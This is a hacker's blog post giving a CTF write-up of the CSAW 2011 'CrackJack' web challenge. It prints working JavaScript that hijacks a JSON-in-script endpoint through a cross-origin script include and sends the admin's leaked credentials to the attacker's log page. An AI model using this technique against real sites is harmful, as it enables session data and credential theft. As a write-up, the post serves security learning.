
Gu1's Website - Hack.lu & CSAW 2011, writeup CrackJack

By Gu1 on 26/09/2011 at 02:00. Tags: csaw, hack.lu, web, writeup.

It's fall again, and like every year, many CTFs are held in these few months.

Earlier this week I participated in the hack.lu CTF, a CTF organized by the FluxFingers team as part of the hack.lu conference in Luxembourg. It was a pretty cool CTF with interesting challenges to solve. I'm not going to write any writeup since there was really nothing interesting to say about the challenges I worked on. You can always find writeups on the web if you're interested; there are a few on shell-storm.org.

I also participated in the CSAW (Cyber Security Awareness Week) CTF qualification round this weekend. It's a CTF organized by NYU-Poly. It will probably just have ended by the time I post this. This CTF was pretty easy and we solved most challenges on the first day. The only challenges left on the second day were either broken or guessing bullsh*t.

One of the challenges involved calling a voicemail in the US where a guy supposedly from a burrito restaurant asked us if we wanted burritos... then we had to guess that the key was the exact sentence pronounced by the guy on the voicemail. "wouldyoulikeburritoswiththat"? :)) Kudos to teach for finding that one.

[Screenshot: CrackJack contact page]

Anyway, one of the interesting things about this CTF was the number of "simulated" client-side/XSS challenges. It's not something we see very often in CTFs and it's a nice change from SQL injections/PHP vulns. One such challenge was "CrackJack", a 500-point web challenge that we solved on the second day.

It consisted of a website with contact, user list and profile pages, all relying heavily on XMLHttpRequest/JSON. We quickly audited the website and all input seemed to be filtered properly. sh4ka checked the contact page and noticed that URLs in the message were visited by a bot with an IP belonging to NYU and a Konqueror user-agent. Even better, JavaScript was executed, so we could run arbitrary JS code in the site admin's browser :P

We looked for a potential CSRF vuln or anything else we could leverage to get admin rights on the website, but there was nothing. Because of the same-origin policy in web browsers, a page under our control could not read the response of a request to an arbitrary page on the challenge site through XMLHttpRequest.

The website's profile page used XMLHttpRequest to retrieve user info:

function getCurrent() {
    var xmlhttp;
    if (window.XMLHttpRequest) {
        xmlhttp=new XMLHttpRequest();
    } else {
        xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
    }

    xmlhttp.onreadystatechange=function() {
        if (xmlhttp.readyState==4 && xmlhttp.status==200) {
            // The response is executed as JavaScript rather than parsed as JSON:
            // it is a script that assigns the global variable "current".
            eval(xmlhttp.responseText);
            userinfo = document.getElementById('userinfo');
            if(!current.authenticated) {
                userinfo.innerHTML = "You aren't logged in! <a href='login.php'>Log in here.</a>";
            } else {
                userinfo.innerHTML = "Your username: "+current.username;
                userinfo.innerHTML += "<br />Your password: "+current.password+" (keep it safe!)";
                userinfo.innerHTML += "<br />Your access level: "+current.access+" ("+(current.access>100 ? "admin" : "not admin")+")";
            }
        }
    }
    // Same-origin request, so the user's session cookie is sent along.
    xmlhttp.open("GET","json/getcurrent.js",true);
    xmlhttp.send();
}

getcurrent.js is actually a PHP page that returns all information about the current user (including the password) as a JSON object, but wrapped in a JavaScript variable assignment rather than served as bare JSON:

var current = {"authenticated":true,"access":"1","username":"haxor","password":"abc123"};

We realized we could simply include this file from our own exploit page with a <script> element and get current's value without having to worry about the same-origin policy: script includes are not subject to it, and since the response is valid JavaScript that assigns a global variable, the included script defines current in our page's scope, where we can read it. (Had the endpoint returned bare JSON, a <script> include would have failed to parse and nothing would have leaked.)

We pretty much knew everything we needed in order to pwn this challenge, but unfortunately the bot was lagging and behaving erratically, taking up to an hour to visit a page we sent through the contact form. We still managed to get working code, submitted the URL and waited patiently. After some time, we noticed the bot had visited the page but had not sent back the data we wanted (the value of "current"). We tried some variations of the code but nothing seemed to work.

At this point, the admins sent everyone a mail containing a hint:

For people who are stuck on CrackJack/Web Challenge 5, the local IP
address is 192.168.4.4. This may make solving the challenge
easier/more possible (although one person has already solved it
without the hint!)

WTF? A local IP? Up until now, we had only tried to include getcurrent.js through its public URL, http://csawctf.poly.edu:40004/challenge2/json/getcurrent.js, but apparently that could not be done directly, or else our first code would have worked by now.

I used BeEF's network fingerprinting module to scan 192.168.4.4 and found that port 80 was open. At that point in the game it was probably 6 or 7 am CEST and I was pretty exhausted, so I went to sleep, expecting to find the challenge solved when I woke up.

Unfortunately, sh4ka had not managed to solve it because of a weird bug in the challenge (for some reason getcurrent.js always contained authenticated: false when he tried to exploit it). I decided to try myself, so I simply adapted the payload, changing the host to 192.168.4.4:

var headID = document.getElementsByTagName("head")[0];
var newScript = document.createElement('script');
newScript.type = 'text/javascript';
// Cross-origin <script> include: the bot's browser fetches getcurrent.js from the
// internal address (with its session cookie) and runs it in our page's scope,
// which defines window.current.
newScript.src = 'http://192.168.4.4/challenge2/json/getcurrent.js';
newScript.addEventListener('load', function() {
    var toalert = '';
    for (var i in window.current)
        toalert += i + ': ' + current[i] + '\n';
    // Exfiltrate the leaked object to our server as an <img> request.
    document.write("<img src='./log.php?" + encodeURI(toalert) + "'/>");
}, false);
headID.appendChild(newScript);
return 1

And I was lucky:

authenticated: true
access: 1000
username: administrator
password: 2d8a579d4d4bbd98399f47df0d6c8fd0be22e3a8

For a split second I feared the password might be a hash I would need to crack, but no, it's the actual plain-text password.

And last... I have something I would like to say.
!£*ù FUCKING TURKEYS !!!11! (you know who you are)

©opyleft Gu1ll4um3r0m41n, 2008-2010.